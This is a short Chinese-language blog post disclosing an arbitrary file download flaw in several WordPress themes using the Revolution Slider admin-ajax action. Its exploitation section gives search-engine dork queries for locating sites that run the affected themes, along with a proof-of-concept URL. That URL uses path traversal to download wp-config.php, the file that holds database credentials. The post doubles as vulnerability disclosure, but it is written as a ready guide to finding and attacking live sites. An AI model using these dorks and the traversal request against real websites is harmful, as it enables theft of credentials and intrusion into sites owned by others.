SPRITEKING

WordPress任意文件下载漏洞附Poc

时间:公元14-09-06 栏目:安全 作者:SPRITEKING 吐槽:0 被黑客围观: 2,918 次





1. 漏洞信息

供应商:Wordpress

WORDPRESS

受影响的主题:

 

cuckootap
beach_apollo
ultimatum 
medicate
Centum
Avada
striking_r

影响:任意文件下载

CWE编号:CWE-200

2. 漏洞描述

WordPress是一种使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设自己的网志。
多个Wordpress主题插件中的’admin-ajax.php’不正确处理用户提交的请求,允许远程攻击者利用漏洞提交特殊的请求下载任意文件。

漏洞发现时间:2014-09-01

3.利用方法

Google & Baidu 关键字:

“Index of” +/wp-content/themes/cuckootap/

“Index of” +/wp-content/themes/IncredibleWP/

“Index of” +/wp-content/themes/ultimatum

“Index of” +/wp-content/themes/medicate/

“Index of” +/wp-content/themes/Centum/

“Index of” +/wp-content/themes/Avada/

“Index of” +/wp-content/themes/striking_r/

“Index of” +/wp-content/themes/beach_apollo/

Poc:

http://存在漏洞站点的域名/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

 

WP

 

 

WP2

声明: 本文由( SPRITEKING )原创编译,转载请保留链接: WordPress任意文件下载漏洞附Poc

WordPress任意文件下载漏洞附Poc:等您坐沙发呢!

发表评论


Time

新浪微博

音乐

为您推荐